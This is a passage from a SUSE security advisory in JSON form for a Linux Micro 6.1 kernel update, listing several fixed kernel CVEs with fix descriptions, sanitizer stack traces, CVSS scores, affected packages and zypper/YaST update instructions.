fs/btrfs/locking.c:281\n btrfs_search_slot_get_root fs/btrfs/ctree.c:1832 [inline]\n btrfs_search_slot+0x4ff/0x2f80 fs/btrfs/ctree.c:2154\n btrfs_lookup_inode+0xdc/0x480 fs/btrfs/inode-item.c:412\n btrfs_read_locked_inode fs/btrfs/inode.c:3892 [inline]\n btrfs_iget_path+0x2d9/0x1520 fs/btrfs/inode.c:5716\n btrfs_search_path_in_tree_user fs/btrfs/ioctl.c:1961 [inline]\n btrfs_ioctl_ino_lookup_user+0x77a/0xf50 fs/btrfs/ioctl.c:2105\n btrfs_ioctl+0xb0b/0xd40 fs/btrfs/ioctl.c:4683\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl+0xf8/0x170 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n other info \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54281",
"url": "https://www.suse.com/security/cve/CVE-2023-54281"
},
{
"category": "external",
"summary": "SUSE Bug 1255820 for CVE-2023-54281",
"url": "https://bugzilla.suse.com/1255820"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54281"
},
{
"cve": "CVE-2023-54282",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54282"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: tuners: qt1010: replace BUG_ON with a regular error\n\nBUG_ON is unnecessary here, and in addition it confuses smatch.\nReplacing this with an error return help resolve this smatch\nwarning:\n\ndrivers/media/tuners/qt1010.c:350 qt1010_init() error: buffer overflow \u0027i2c_data\u0027 34 \u003c= 34",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54282",
"url": "https://www.suse.com/security/cve/CVE-2023-54282"
},
{
"category": "external",
"summary": "SUSE Bug 1255810 for CVE-2023-54282",
"url": "https://bugzilla.suse.com/1255810"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54282"
},
{
"cve": "CVE-2023-54283",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54283"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Address KCSAN report on bpf_lru_list\n\nKCSAN reported a data-race when accessing node-\u003eref.\nAlthough node-\u003eref does not have to be accurate,\ntake this chance to use a more common READ_ONCE() and WRITE_ONCE()\npattern instead of data_race().\n\nThere is an existing bpf_lru_node_is_ref() and bpf_lru_node_set_ref().\nThis patch also adds bpf_lru_node_clear_ref() to do the\nWRITE_ONCE(node-\u003eref, 0) also.\n\n==================================================================\nBUG: KCSAN: data-race in __bpf_lru_list_rotate / __htab_lru_percpu_map_update_elem\n\nwrite to 0xffff888137038deb of 1 bytes by task 11240 on cpu 1:\n__bpf_lru_node_move kernel/bpf/bpf_lru_list.c:113 [inline]\n__bpf_lru_list_rotate_active kernel/bpf/bpf_lru_list.c:149 [inline]\n__bpf_lru_list_rotate+0x1bf/0x750 kernel/bpf/bpf_lru_list.c:240\nbpf_lru_list_pop_free_to_local kernel/bpf/bpf_lru_list.c:329 [inline]\nbpf_common_lru_pop_free kernel/bpf/bpf_lru_list.c:447 [inline]\nbpf_lru_pop_free+0x638/0xe20 kernel/bpf/bpf_lru_list.c:499\nprealloc_lru_pop kernel/bpf/hashtab.c:290 [inline]\n__htab_lru_percpu_map_update_elem+0xe7/0x820 kernel/bpf/hashtab.c:1316\nbpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313\nbpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200\ngeneric_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687\nbpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534\n__sys_bpf+0x338/0x810\n__do_sys_bpf kernel/bpf/syscall.c:5096 [inline]\n__se_sys_bpf kernel/bpf/syscall.c:5094 [inline]\n__x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nread to 0xffff888137038deb of 1 bytes by task 11241 on cpu 0:\nbpf_lru_node_set_ref kernel/bpf/bpf_lru_list.h:70 [inline]\n__htab_lru_percpu_map_update_elem+0x2f1/0x820 kernel/bpf/hashtab.c:1332\nbpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313\nbpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200\ngeneric_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687\nbpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534\n__sys_bpf+0x338/0x810\n__do_sys_bpf kernel/bpf/syscall.c:5096 [inline]\n__se_sys_bpf kernel/bpf/syscall.c:5094 [inline]\n__x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nvalue changed: 0x01 -\u003e 0x00\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 11241 Comm: syz-executor.3 Not tainted 6.3.0-rc7-syzkaller-00136-g6a66fdd29ea1 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/30/2023\n==================================================================",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54283",
"url": "https://www.suse.com/security/cve/CVE-2023-54283"
},
{
"category": "external",
"summary": "SUSE Bug 1255809 for CVE-2023-54283",
"url": "https://bugzilla.suse.com/1255809"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54283"
},
{
"cve": "CVE-2023-54285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niomap: Fix possible overflow condition in iomap_write_delalloc_scan\n\nfolio_next_index() returns an unsigned long value which left shifted\nby PAGE_SHIFT could possibly cause an overflow on 32-bit system. Instead\nuse folio_pos(folio) + folio_size(folio), which does this correctly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54285",
"url": "https://www.suse.com/security/cve/CVE-2023-54285"
},
{
"category": "external",
"summary": "SUSE Bug 1255807 for CVE-2023-54285",
"url": "https://bugzilla.suse.com/1255807"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54285"
},
{
"cve": "CVE-2023-54289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qedf: Fix NULL dereference in error handling\n\nSmatch reported:\n\ndrivers/scsi/qedf/qedf_main.c:3056 qedf_alloc_global_queues()\nwarn: missing unwind goto?\n\nAt this point in the function, nothing has been allocated so we can return\ndirectly. In particular the \"qedf-\u003eglobal_queues\" have not been allocated\nso calling qedf_free_global_queues() will lead to a NULL dereference when\nwe check if (!gl[i]) and \"gl\" is NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54289",
"url": "https://www.suse.com/security/cve/CVE-2023-54289"
},
{
"category": "external",
"summary": "SUSE Bug 1255806 for CVE-2023-54289",
"url": "https://bugzilla.suse.com/1255806"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
